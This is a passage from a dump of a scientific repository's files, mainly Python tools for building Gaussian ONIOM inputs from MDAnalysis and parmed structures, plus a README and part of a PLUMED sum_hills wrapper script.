'index'])\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--base_name', type=str,\n help='base name for this calculation, likely not '\n 'including any index')\n parser.add_argument('-i', '--index', type=int,\n help='index of this calculation')\n # TODO use mutually exclusive arguments here\n parser.add_argument('-x', '--xyz', type=str, default=None,\n help='manual input geometry (will take precedence '\n 'over topology/trajectory frame selection)')\n parser.add_argument('-c', '--top', type=str, default=None,\n help='topology/structure file (e.g., .gro, .xyz)')\n parser.add_argument('-f', '--trajectory', type=str, default=None,\n help='trajectory file (e.g., .xtc, .trr, .dcd)')\n\n def parse_crit(kvv):\n k, vv = kvv.split('=')\n vs = tuple((float(v) for v in vv.split(',')))\n return k, vs\n\n parser.add_argument('-s', '--criteria', action='append',\n type=parse_crit, metavar='key=min,max',\n help='criteria for selection of possible frames from '\n 'the trajectory. To provide more than one '\n 'criterion, use this argument multiple times')\n parser.add_argument('-d', '--react_dist', type=float, default=False,\n help='Distance to set between atoms 20 and 39, '\n 'in angstroms. 
If this evaluates to False, '\n 'no changes to the geometry will be made')\n parser.add_argument('-g', '--mgi_dicts', type=str,\n help='path to json file that parses to a list of '\n 'dicts of arguments for make_gaussian_input in '\n 'order to create inputs to Gaussian')\n parser.add_argument('--restart', default=None,\n help='Path to status file for resuming an already '\n 'started calculation')\n parser.add_argument('-j', '--job_status', nargs='*', default=None,\n help='Folders or paths to status files to report the '\n 'status of. If nothing is given, status files in '\n 'current directly will be used. This flag cannot '\n 'be used with any other arguments other than -v.')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='If used, the stdout log will be set to DEBUG')\n p_args = parser.parse_args()\n if p_args.verbose:\n _setup_log(logging.DEBUG)\n else:\n _setup_log()\n if p_args.job_status is not None:\n status_df = get_job_statuses(p_args.job_status)\n print(status_df)\n sys.exit(0)\n elif p_args.restart is not None:\n calc = Calc(status=p_args.restart)\n else:\n _mgi_dicts = json.load(open(p_args.mgi_dicts, 'r'))\n _criteria = None if p_args.criteria is None else dict(p_args.criteria)\n calc = Calc(base_name=p_args.base_name,\n ind=p_args.index,\n geometry=p_args.xyz,\n top=p_args.top,\n traj=p_args.trajectory,\n criteria=_criteria,\n react_dist=p_args.react_dist,\n mgi_dicts=_mgi_dicts\n )\n calc.run_calc()\n"
},
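The restart machinery in the gautools/aml.py record above hinges on StatusDict, which persists the entire dict to JSON on every assignment via a write-then-rename. Below is a minimal standalone sketch of that pattern; 'demo-status.json' is an assumed example path, and the class name is hypothetical.

# Minimal write-through dict sketch mirroring aml.StatusDict:
# each assignment dumps the dict to a temp file, then renames it over
# the status file so a reader never sees a half-written JSON document.
import json
import os
import pathlib


class WriteThroughDict(dict):
    def __init__(self, path):
        self.path = pathlib.Path(path).resolve()
        if self.path.is_file():
            # resuming: start from whatever the last run recorded
            super().__init__(json.load(self.path.open('r')))
        else:
            super().__init__()
        self.temp_path = self.path.with_suffix('.json.new')

    def __setitem__(self, key, value):
        super().__setitem__(key, value)
        with self.temp_path.open('w') as f:
            json.dump(self, f, indent=4)
        os.rename(str(self.temp_path), str(self.path))


status = WriteThroughDict('demo-status.json')
status['current_lvl'] = 0  # already on disk if the job dies right here

On POSIX filesystems, os.rename within the same directory is atomic, which is why Calc can be killed by SIGUSR2 at any point and still trust the status file when the resubmitted job reads it.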
{
"alpha_fraction": 0.5684356689453125,
"alphanum_fraction": 0.5744384527206421,
"avg_line_length": 43.28697204589844,
"blob_id": "4038d78488ec6501e3cfdfc89f8dcdf82b528046",
"content_id": "216f6ae980c69df9af71173430c5680f900091bc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25155,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 568,
"path": "/gautools/oniom.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA set of tools for setting up Gaussian ONIOM calculations\n\"\"\"\n\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2019. #\n# [email protected] [email protected] #\n# #\n# Copyright 2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\nimport collections\nimport logging\nimport re\nfrom typing import List, Union, Tuple, Dict\n\nimport MDAnalysis\nimport numpy as np\nimport parmed\n\n__all__ = ['OniomUniverse']\n\nlog = logging.getLogger(__name__)\n\n\nclass NoStructureException(Exception):\n pass\n\n\nclass OniomStructure(object):\n\n def __init__(self,\n structure: parmed.structure.Structure = None,\n structure_file: str = None,\n structure_args: Union[Tuple, List] = None,\n structure_kwargs: dict = None,\n only_unique_types: bool = False,\n only_used_terms: bool = True):\n \"\"\"\n Initialize OniomStructure to create Gaussian Amber MM input section\n\n :param structure_file: filename (first argument) to be provided to\n instantiate the Structure\n :param structure_args: arguments to be provided to instantiate the\n Structure\n :param structure_kwargs: keyword arguments to be provided to instantiate\n the Structure\n :param only_unique_types: If False (default), all bonds, angles,\n dihedrals, and impropers will be included.\n If True, only the unique elements for each of those will be\n included, which may not define the terms for all possible\n interactions because one type may be used for several atom types.\n For example, there might be an angle_type that should be used for\n \"*-C3-C3\", but it might only get defined for \"H1-C3-C3\".\n :param only_used_terms: If True (default), the params returned will\n only include those with all atoms contained in the atoms actually\n used. 
This can make the section returned shorter if not all atoms\n have been selected, especially if `only_unique_types` is False.\n This will also require `atoms_used_indices` to be defined, which\n it will be if `molecule_section` is accessed first (in an associated\n OniomUniverse).\n If False, all parameters will be given.\n \"\"\"\n log.debug('Initializing OniomStructure object')\n _struc_args = list() if structure_args is None else structure_args\n _struc_kwargs = dict() if structure_kwargs is None else structure_kwargs\n if structure_file is not None:\n _struc_args = [structure_file] + _struc_args\n if structure is None:\n if (structure_file is None and\n structure_args is None and\n structure_kwargs is None):\n log.warning('No arguments given to initialize OniomStructure')\n raise NoStructureException\n else:\n self.structure = parmed.load_file(*_struc_args,\n **_struc_kwargs)\n else:\n self.structure = structure\n self.only_unique_types = only_unique_types\n self._unique_types = {\n 'bonds': self._get_bond_types_uniq(),\n 'angles': self._get_angle_types_uniq(),\n 'dihedrals': self._get_dihedral_types_uniq(),\n 'impropers': self._get_improper_types_uniq()\n }\n self._non_unique_types = {\n 'bonds': self._get_bond_types_nu(),\n 'angles': self._get_angle_types_nu(),\n 'dihedrals': self._get_dihedral_types_nu(),\n 'impropers': self._get_improper_types_nu()}\n self._types_dict = {True: self._unique_types,\n False: self._non_unique_types}\n self.atoms_used_indices = None\n self.only_used_terms = only_used_terms\n\n @property\n def params_section(self) -> List[str]:\n \"\"\"\n Parameter specification for Gaussian job using Amber MM\n\n :return: The lines to be included for Gaussian jobs using Amber MM and\n HardFirst, SoftFirst, or SoftOnly\n \"\"\"\n # This doesn't seem perfect: the selection functions don't\n # really work because (for example) a single bond_type might\n # be used for different atom types, which is what is\n # currently assumed. Need to find a way to either find all\n # atom types for which it should be used (possibly using\n # wildcards), or just iterate over all bonds/angles/dihedrals\n # instead of iterating over *_types.\n log.debug('Creating params_section in OniomStructure')\n self._check_structure_universe_compatibility()\n lines = list()\n # get types based on if only_unique_types is True or False\n types = self._types_dict[self.only_unique_types]\n if self.only_used_terms and self.atoms_used_indices is not None:\n types = self._remove_unused_terms(types)\n lines.append('! Van der Waals parameters\\n!\\n')\n atom_types = self._get_atom_types()\n param_lines = set()\n for at in atom_types:\n param_lines.add(self._make_atomtype_line(at))\n lines += list(param_lines)\n lines.append('! Stretch parameters\\n!\\n')\n bond_types = types['bonds']\n param_lines = set()\n for bond in bond_types:\n param_lines.add(self._make_bondtype_line(bond))\n lines += list(param_lines)\n lines.append('! Bend parameters\\n!\\n')\n angle_types = types['angles']\n param_lines = set()\n for angle in angle_types:\n param_lines.add(self._make_angletype_line(angle))\n lines += list(param_lines)\n lines.append('! Dihedral parameters\\n!\\n')\n dihedral_types = types['dihedrals']\n param_lines = set()\n for dihed in dihedral_types:\n param_lines.add(self._make_dihedraltype_line(dihed))\n lines += list(param_lines)\n lines.append('! 
Improper dihedral parameters\\n!\\n')\n improper_types = types['impropers']\n param_lines = set()\n for dihed in improper_types:\n param_lines.add(self._make_impropertype_line(dihed))\n lines += list(param_lines)\n return lines\n\n def _get_atom_types(self,) -> set:\n atom_types = set()\n for atom in self.structure.atoms:\n atom_types.add(atom.atom_type)\n return atom_types\n\n @staticmethod\n def _make_atomtype_line(atom_type) -> str:\n sigma = atom_type.urmin\n epsilon = atom_type.uepsilon\n sigma = sigma.value_in_unit(parmed.unit.angstrom)\n epsilon = epsilon.value_in_unit(parmed.unit.kilocalorie_per_mole)\n return f'VDW {atom_type.name: <2} {sigma:4f} {epsilon:4f}\\n'\n\n @staticmethod\n def _get_types(instances, types) -> List:\n instance_types = list()\n for _type in types:\n for inst in instances:\n if inst.type == _type:\n instance_types.append(inst)\n break\n return instance_types\n\n def _get_bond_types_uniq(self, ) -> List:\n return self._get_types(self.structure.bonds, self.structure.bond_types)\n\n def _get_bond_types_nu(self) -> List:\n return self.structure.bonds\n\n @staticmethod\n def _make_bondtype_line(bond: parmed.topologyobjects.Bond) -> str:\n a1, a2 = bond.atom1.type, bond.atom2.type\n k = bond.type.uk.value_in_unit(parmed.unit.kilocalorie_per_mole /\n parmed.unit.angstrom ** 2)\n req = bond.type.ureq.value_in_unit(parmed.unit.angstrom)\n return f'HrmStr1 {a1:2} {a2:2} {k: <5.1f} {req: <5.3f}\\n'\n\n def _get_angle_types_uniq(self, ) -> List:\n return self._get_types(self.structure.angles,\n self.structure.angle_types)\n\n def _get_angle_types_nu(self) -> List:\n return self.structure.angles\n\n @staticmethod\n def _make_angletype_line(angle: parmed.topologyobjects.Angle) -> str:\n a1, a2, a3 = angle.atom1.type, angle.atom2.type, angle.atom3.type\n k = angle.type.uk.value_in_unit(parmed.unit.kilocalorie_per_mole /\n parmed.unit.radian ** 2)\n thetaeq = angle.type.utheteq.value_in_unit(parmed.unit.degree)\n return f'HrmBnd1 {a1:2} {a2:2} {a3:2} {k: >5.1f} {thetaeq:6.2f}\\n'\n\n def _get_improper_types_uniq(self, ) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n return self._get_types(self.structure.dihedrals,\n self.structure.dihedral_types)\n\n def _get_improper_types_nu(self) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n return self.structure.dihedrals\n\n @staticmethod\n def _make_impropertype_line(dihed: parmed.topologyobjects.Dihedral\n ) -> str:\n a1, a2, a3, a4 = (dihed.atom1.type, dihed.atom2.type,\n dihed.atom3.type, dihed.atom4.type)\n phi_k = dihed.type.uphi_k.value_in_unit(\n parmed.unit.kilocalorie_per_mole)\n phase = dihed.type.uphase.value_in_unit(parmed.unit.degree)\n per = dihed.type.per\n return (f'ImpTrs {a1:2} {a2:2} {a3:2} {a4:2} '\n f'{phi_k: >5.1f} {phase:5.1f} {per:3.1f}\\n')\n\n def _get_dihedral_types_uniq(self, ) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n # and the dihedrals get stored as Ryckaert-Bellemans\n # dihedrals (function 3)\n return self._get_types(self.structure.rb_torsions,\n self.structure.rb_torsion_types)\n\n def _get_dihedral_types_nu(self) -> List:\n # Somewhere along antechamber -> acpype, the impropers are stored\n # as dihedrals (of GROMACS function 1)\n # and the dihedrals get stored as Ryckaert-Bellemans\n # dihedrals (function 3)\n return self.structure.rb_torsions\n\n @staticmethod\n def 
_make_dihedraltype_line(dihed: parmed.topologyobjects.Dihedral\n ) -> str:\n a1, a2, a3, a4 = (dihed.atom1.type, dihed.atom2.type,\n dihed.atom3.type, dihed.atom4.type)\n dtl = parmed.DihedralTypeList.from_rbtorsion(dihed.type)\n phases = [0] * 4\n phis = [0.] * 4\n for dihed_type in dtl:\n phi_k = dihed_type.uphi_k.value_in_unit(\n parmed.unit.kilocalorie_per_mole)\n phase = dihed_type.uphase.value_in_unit(parmed.unit.degree)\n per = dihed_type.per\n phases[per], phis[per] = phase, phi_k\n output = (f'AmbTrs {a1:2} {a2:2} {a3:2} {a4:2} ' +\n ' '.join([f'{i: >3d}' for i in phases]) + ' ' +\n ' '.join([f'{i: >6.3f}' for i in phis]) +\n ' -1.0\\n')\n return output\n\n def _remove_unused_terms(self, types) -> Dict[str, list]:\n atoms_used = np.array(self.structure.atoms)[self.atoms_used_indices]\n n_atoms_by_type = {'bonds': 2, 'angles': 3, 'dihedrals': 4,\n 'impropers': 4}\n for key in types:\n n_atoms = n_atoms_by_type[key]\n return_params = []\n input_params = types[key]\n for param in input_params:\n for i in range(n_atoms):\n i += 1\n if not getattr(param, f'atom{i}') in atoms_used:\n break\n else:\n return_params.append(param)\n types[key] = return_params\n return types\n\n def _check_structure_universe_compatibility(self):\n log.debug('Checking compatibility of this structure with given args')\n if self.atoms_used_indices is None:\n return None\n max_ind = max(self.atoms_used_indices)\n try:\n self.structure.atoms[max_ind]\n return None\n except IndexError:\n raise ValueError('given atoms_used_indices requests atoms that '\n 'are not in this structure. Check to make sure '\n 'this Structure is compatible with the Universe.')\n\n\nclass OniomUniverse(object):\n \"\"\"\n Object to help easily create Gaussian ONIOM input sections\n\n\n There are a few ways to instantiate this object.\n First, it can be instantiated with an existing MDAnalysis Universe\n instance and an existing parmed Structure instance:\n\n >>> univ = MDAnalysis.Universe('geom.pdb', 'traj.xtc')\n >>> structure = parmed.load_file('topology.top')\n >>> ou = OniomUniverse(univ=univ, structure=structure)\n\n Alternatively, the Universe and/or Structure can be instantiated here:\n\n >>> ou = OniomUniverse(univ_args=['geom.pdb', 'traj.xtc'], \\\n structure_file='topology.top')\n\n Any combination of these methods can also be used.\n\n Also, `high_select` and `low_select` need to be provided during or\n after instantiation before accessing the Gaussian input sections:\n\n >>> ou = OniomUniverse(univ=univ, structure=structure, \\\n high_select='resid 2-3')\n >>> ou.low_select = 'protein or byres around 5 resid 2-3'\n\n Then, the Gaussian input sections can be created:\n\n >>> mol_sec = ou.molecule_section\n >>> bond_sec = ou.bonds_section\n >>> param_sec = ou.params_section\n\n Note, if you do not need the parameter section (e.g., only using\n already included AMBER atom types), the structure or structure files\n need not be specified. That portion is optional, and `molecule_section` and\n `params_section` do not depend on the structure.\n\n The interfaces between high and low are not treated specially, so link\n atoms will need to be manually treated. 
That can be done after writing\n to an input file, or using something like::\n\n interface_atom = univ.select_atoms('bynum 88')\n interface_atom_index = ou.atom_to_line_num[interface_atom] - 1\n # (because the dict gives a (Gaussian) 1-based index)\n interface_atom_line = mol_sec[interface_atom_index][:-2]+' H-H1-0.1\\\\n'\n # (remove newline, add link atom definition and newline)\n mol_sec[interface_atom_index] = interface_atom_line\n\n \"\"\"\n\n def __init__(self, univ: MDAnalysis.Universe = None,\n structure: parmed.Structure = None,\n high_select: str = None,\n low_select: str = None,\n overlap_okay: bool = False,\n univ_args=None, univ_kwargs=None,\n structure_file=None,\n structure_args=None, structure_kwargs=None,\n freeze_dict: dict = None):\n \"\"\"\n Initialize OniomUniverse to create Gaussian ONIOM input sections\n\n :param univ: Universe with the geometry and bonding information for the\n system of interest. Note, the geometry must include bonding\n information or MDAnalysis will have to be told to guess them:\n https://www.mdanalysis.org/docs/documentation_pages/topology/guessers.html#MDAnalysis.topology.guessers.guess_bonds\n :param structure: Structure with atom types, bonds, angles,\n etc. Note, this is only currently written to work with AMBER (or\n really GAFF as made by Antechamber/AcPype), and it is unclear\n how it will work for other force fields or implementations.\n :param high_select: Selection string for the atoms to be included in the\n \"high\" calculation\n :param low_select: Selection string for the atoms to be included in the\n \"low\" calculation\n :param overlap_okay: If True, overlap between the high and low\n selections will be ignored and anything in the overlap will be\n included in the \"high\" region\n :param univ_args: arguments to be provided to instantiate the Universe\n :param univ_kwargs: keyword arguments to be provided to instantiate\n the Universe\n :param structure_file: filename (first argument) to be provided to\n instantiate the Structure\n :param structure_args: arguments to be provided to instantiate the\n Structure\n :param structure_kwargs: keyword arguments to be provided to instantiate\n the Structure\n :param freeze_dict: mapping from levels ('H' and 'L') to freeze\n commands (0 for unfrozen, -1 for frozen).\n Default is `{'H': 0, 'L': -1}`\n \"\"\"\n log.debug('Initializing OniomUniverse object')\n univ_args = list() if univ_args is None else univ_args\n # probably invalid anyway because Universe can't be kwarg only\n univ_kwargs = dict() if univ_kwargs is None else univ_kwargs\n if univ is None:\n self.universe = MDAnalysis.Universe(*univ_args, **univ_kwargs)\n else:\n self.universe = univ\n self._check_universe()\n try:\n self.oniom_structure = OniomStructure(\n structure=structure,\n structure_file=structure_file,\n structure_args=structure_args,\n structure_kwargs=structure_kwargs)\n except NoStructureException:\n self.oniom_structure = None\n self.high_select = high_select\n self.low_select = low_select\n self.overlap_okay = overlap_okay\n self.atom_to_line_num = dict()\n self.n_atoms_in_input = 0\n self.freeze_dict = ({'H': 0, 'L': -1} if freeze_dict is None\n else freeze_dict)\n\n @property\n def molecule_section(self,) -> List[str]:\n \"\"\"\n Molecule specification lines for ONIOM calculation\n\n This defines a dict mapping `Atom`s to atom number (line number in\n input) as `self.atom_to_line_num`, and number of atoms included in\n the input as `self.n_atoms_in_input`.\n\n :return: The lines to be written into the
input\n \"\"\"\n log.debug('Creating molecule section for OniomUniverse')\n if self.high_select is None or self.low_select is None:\n raise self.SelectionError('Both `high_select` and `low_select` '\n 'must be specified')\n high_atoms = self.universe.select_atoms(self.high_select)\n low_atoms = self.universe.select_atoms(self.low_select)\n n_atoms_in_both = high_atoms.intersection(low_atoms).n_atoms\n if n_atoms_in_both and not self.overlap_okay:\n log.error('High and low selections are not mutually exclusive and '\n 'overlap_okay is not True')\n raise ValueError('The selections are not mutually exclusive. '\n 'Make mutually exclusive or set overlap_okay=True')\n atoms_used_indices = []\n lines = []\n line_num = 0\n for atom in self.universe.atoms:\n if atom in high_atoms:\n level = 'H'\n elif atom in low_atoms:\n level = 'L'\n else:\n continue\n line_num += 1\n lines.append(self._make_atom_line(atom=atom, level=level,))\n atoms_used_indices.append(atom.index)\n self.atom_to_line_num[atom] = line_num\n sel_n_atoms = (high_atoms.n_atoms + low_atoms.n_atoms - n_atoms_in_both)\n if line_num != sel_n_atoms:\n mes = ('Number of lines and n_atoms in selections differ '\n f'({line_num} and {sel_n_atoms})')\n log.error(mes)\n raise ValueError(mes)\n self.n_atoms_in_input = sel_n_atoms\n if self.oniom_structure is not None:\n self.oniom_structure.atoms_used_indices = atoms_used_indices\n return lines\n\n @property\n def bonds_section(self, ) -> List[str]:\n \"\"\"\n Bond specifications for a Gaussian job with `geom=connectivity`\n\n :return: The lines to be written in the input after the molecule\n specification\n \"\"\"\n log.debug('Creating bonds section for OniomUniverse')\n if self.n_atoms_in_input == 0:\n log.error('No atoms yet picked for this OniomUniverse')\n raise ValueError('No atoms have been put into the molecule '\n 'specification yet so the bonds cannot yet be '\n 'defined. Either run `molecule_section` '\n 'first or check your selections.')\n atln = self.atom_to_line_num\n bond_dict = collections.defaultdict(list)\n for bond in self.universe.bonds:\n a1, a2 = bond.atoms\n try:\n bond_dict[atln[a1]].append(f'{atln[a2]} 1.0')\n except KeyError:\n continue\n lines = []\n for i in range(self.n_atoms_in_input):\n i += 1 # use 1-based indexing\n bonds = ' '.join(bond_dict[i])\n lines.append(f'{i} {bonds}\\n')\n return lines\n\n @property\n def params_section(self):\n if self.oniom_structure is None:\n log.warning('No structure for this OniomUniverse but '\n 'params_section was accessed')\n raise NoStructureException('No Structure given for this '\n 'OniomUniverse')\n else:\n return self.oniom_structure.params_section\n\n params_section.__doc__ = OniomStructure.params_section.__doc__\n\n _re_element = re.compile(r'[A-Z][a-z]?')\n\n def _get_elem(self, atom: MDAnalysis.core.groups.Atom) -> str:\n \"\"\"\n Get element name from Atom object\n\n This counts on any multi-letter element being named as Ca (capital\n followed by lower case).
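For example, an atom named 'Cl1' is read as chlorine, while 'CL1' matches only 'C' and is read as carbon.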
Also, single-letter element names must be\n capitalized and not followed by a lower-case letter.\n\n An alternative method could be a mapping from masses to elements, or\n use the parmed Structure which knows element information.\n \"\"\"\n elem_match = self._re_element.match(atom.name)\n if elem_match:\n return elem_match.group(0)\n else:\n mes = f'Could not find element for atom {atom}'\n log.error(mes)\n raise ValueError(mes)\n\n def _make_atom_line(self, atom: MDAnalysis.core.groups.Atom,\n level: str,) -> str:\n elem = self._get_elem(atom)\n line = (f'{elem}-'\n f'{atom.type}-'\n f'{atom.charge:3f} {self.freeze_dict[level]} '\n f'{atom.position[0]:4f} '\n f'{atom.position[1]:4f} '\n f'{atom.position[2]:4f} {level}\\n')\n return line\n\n def _check_universe(self):\n log.debug('Checking attributes of this Universe')\n if not hasattr(self.universe, 'bonds'):\n mes = ('This Universe does not have defined bonds. Try '\n 'an input with defined bonds or try `guess_bonds=True`.')\n log.error(mes)\n raise ValueError(mes)\n if not hasattr(self.universe.atoms[0], 'charge'):\n mes = ('The atoms in this Universe do not have charge defined. '\n 'Try a format with defined charge.')\n log.error(mes)\n raise ValueError(mes)\n if not hasattr(self.universe.atoms[0], 'position'):\n mes = ('The atoms in this Universe do not have position defined. '\n 'Try a format with defined positions or also load in a '\n 'trajectory file (can just be a pdb or xyz file).')\n log.error(mes)\n raise ValueError(mes)\n\n class SelectionError(ValueError):\n pass\n"
},
{
"alpha_fraction": 0.7981510162353516,
"alphanum_fraction": 0.7981510162353516,
"avg_line_length": 48.92307662963867,
"blob_id": "51c6458af2f171531734256aba5d576504df6302",
"content_id": "60367c5ee45f8acea312733a9821062cbf97ec68",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 649,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 13,
"path": "/README.md",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "This repository contains some scripts and a package related to running and \nanalyzing Gaussian calculations (and possibly a little for Q-Chem). \nThere is also some older code for looking at the convergence of metadynamics\ncalculations run with PLUMED.\n\nTwo dependencies of gautools that might be harder to find and will likely not\ninstall automatically are:\n * [ParaTemp](https://github.com/theavey/ParaTemp)\n * [thtools](https://github.com/theavey/thtools)\n\nThere was previously a script to help setup parallel tempering calculations,\nbut that was removed because a newer version is available in \n[ParaTemp](https://github.com/theavey/ParaTemp).\n"
},
{
"alpha_fraction": 0.516644299030304,
"alphanum_fraction": 0.5204607844352722,
"avg_line_length": 42.94099426269531,
"blob_id": "1f03e8f69da6c6b1be39ef75c4241f3b16688707",
"content_id": "411625e4cc1dd6ff961f5a9ebc07b8c240d62fb7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14149,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 322,
"path": "/sumHills/interfaceToSumHills.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3.4\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n# This is written to work with python 3.4 because it should be good to\n# be working on the newest version of python.\n\nimport glob\nimport argparse\nimport subprocess\nimport readline\nimport os\nimport shutil\nfrom datetime import datetime\n\n__version__ = '0.2.2'\n\nparser = argparse.ArgumentParser(description='Use PLUMED utility to sum '\n 'HILLS and then put into '\n 'Mathematica friendly format')\nparser.add_argument('-H', '--hills', default='HILLS',\n help='name of the HILLS file')\nparser.add_argument('-s', '--stride', default=10000,\n help='specify the stride for integrating '\n 'hills file (default 10000)')\nparser.add_argument('-a', '--ask', action='store_true',\n help='Flag for specifying that it should ask for min, '\n 'max, bin, and spacing')\nparser.add_argument('-v', '--verbose', action='store_true',\n help='make script more verbose')\nparser.add_argument('-f', '--folder', default='SumHills',\n help='Folder in which this will be run. 
Can be '\n 'deleted automatically using -c 3.')\nparser.add_argument('-t', '--temp_file', default='temp_data_file.m',\n help='File in which to store all the data')\nparser.add_argument('-n', '--var_name', default='summedHills',\n help='Name of variable to be assigned for Mathematica')\nparser.add_argument('-T', '--template', default='sumHillsTempl.m',\n help='Output template file')\nparser.add_argument('-o', '--output_name', default='summedHills.m',\n help='Name of the file to be output')\nparser.add_argument('-e', '--exists', action='store_true',\n help='Use this argument if the fes data already exists')\nparser.add_argument('-c', '--clean', type=int, default=2,\n help='Argument for how much to clean up\\n'\n '0 does not delete or move anything\\n'\n '>0 moves output to starting folder '\n 'and deletes copy of HILLS file\\n'\n '>1 deletes temp data file\\n'\n '>2 deletes temp folder and contents\\n'\n 'default is 2')\nparser.add_argument('--version', action='version',\n version='%(prog)s v{}'.format(__version__))\nargs = parser.parse_args()\n\n\n# An input function that can prefill in the text entry\ndef rlinput(prompt, prefill=''):\n readline.set_startup_hook(lambda: readline.insert_text(prefill))\n try:\n # This was raw_input, but that's deprecated in py3\n return input(prompt)\n finally:\n readline.set_startup_hook()\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\ndef run_plumed_sum_hills():\n \"\"\"This function takes no arguments and returns nothing.\n Using the command line values stored in args, it will run the PLUMED\n sum_hills utility.\"\"\"\n command_line = ['mpirun', '-n', '1', 'plumed', 'sum_hills']\n command_line += ['--hills', args.hills]\n if args.verbose:\n print('hills file name is {}'.format(args.hills))\n command_line += ['--stride', str(args.stride)]\n if args.verbose:\n print('data output stride is {}'.format(args.stride))\n if args.ask:\n print('length of min, max, bin, and spacing should be equal '\n 'to number of CVs\\n'\n 'For 2 CVs for example, format as \"-pi,-pi\"')\n minim = str(rlinput('min = '))\n maxim = str(rlinput('max = '))\n spacing = str(rlinput('grid spacing = '))\n bins = str(rlinput('num of bins = '))\n # Check input arguments for PLUMED sum_hills\n if bins:\n if minim or maxim:\n if not (minim and maxim):\n print('If you give a min or max, you need min, '\n 'max, and bin or spacing')\n minim = rlinput('min = ', minim)\n maxim = rlinput('max = ', maxim)\n else:\n if spacing:\n if minim or maxim:\n if not(minim and maxim):\n print('If you give a min or max, you need min, '\n 'max, and bin or spacing')\n minim = rlinput('min = ', minim)\n maxim = rlinput('max = ', maxim)\n else:\n if minim or maxim:\n if not(minim and maxim):\n print('If you give a min or max, you need min, '\n 'max, and bin or spacing')\n minim = rlinput('min = ', minim)\n maxim = rlinput('max = ', maxim)\n spacing = rlinput('grid spacing = ')\n bins = rlinput('num of bins = ')\n # Put these arguments into the list of arguments to be submitted\n if bins:\n command_line += ['--bin', bins]\n if args.verbose:\n print('number of bins is {}'.format(bins))\n if spacing:\n command_line += ['--spacing', spacing]\n if args.verbose:\n print('grid spacing: {}'.format(spacing))\n if minim or maxim:\n if minim and maxim:\n command_line += ['--min', str(minim),\n '--max', str(maxim)]\n if args.verbose:\n print('min: {}, max: {}'.format(minim, maxim))\n else:\n raise ValueError('Need to have both min and max!')\n command_line_str = ' 
'.join(command_line)\n print('command line argument is:\\n{}'.format(command_line_str))\n print('Running PLUMED sum_hills utility...')\n # Run the PLUMED sum_hills utility and save/print the output as it comes\n with open('plumed_output.log', 'w') as log_file:\n with subprocess.Popen(command_line,\n stdout=subprocess.PIPE, bufsize=1,\n universal_newlines=True) as proc:\n for line in proc.stdout:\n log_file.write(line)\n if args.verbose:\n print(line, end='')\n #if proc.returncode != 0:\n # todo check to make sure it ran okay? maybe subprocess does that already\n print('Done running PLUMED sum_hills utility')\n\n\ndef setup_folder():\n \"\"\"This function takes no arguments and returns nothing.\n It will create a folder for making all this data, and\n it will copy the specified hills file there.\"\"\"\n working_folder = args.folder\n # Make the working folder, don't raise error if it already exists\n os.makedirs(working_folder, exist_ok=True)\n copyout = shutil.copy(args.hills, working_folder)\n if args.verbose:\n print('HILLS file copied to {}'.format(copyout))\n os.chdir(working_folder)\n\n\ndef read_plumed_stuff():\n \"\"\"This function takes no arguments and returns nothing.\n It will save the output data from plumed to a formatted\n temporary file that can then be read to put the data\n into the file that Mathematica can read.\n It defines the global variables num_of_cvs, formatted_data,\n and fes_file_names.\"\"\"\n global num_of_cvs, formatted_data, fes_file_names\n print('Reading PLUMED output files')\n fes_file_names = glob.glob('fes*.dat')\n # Make sure the list is in the proper order:\n fes_file_names.sort() # sort files alphanumerically\n fes_file_names.sort(key=len) # sort files by length\n # Find number of CVs:\n # At least in the current implementation of PLUMED, the output is\n # the list of CV coordinates, then the height there, then the\n # derivative with respect to each of the CVs, hence the\n # (number of fields - 1) / 2.\n with open(fes_file_names[0], 'r') as file:\n for line in file:\n if line.startswith('#'):\n continue\n num_fields = len(line.split())\n num_of_cvs = (num_fields - 1) / 2.\n if num_of_cvs.is_integer():\n num_of_cvs = int(num_of_cvs)\n else:\n print('number of CVs found to be {}!'.format(num_of_cvs))\n num_of_cvs = int(rlinput('Real number of CVs = ',\n str(int(num_of_cvs))))\n break\n all_data = []\n for file in fes_file_names:\n f_data = []\n if args.verbose:\n print('Reading file 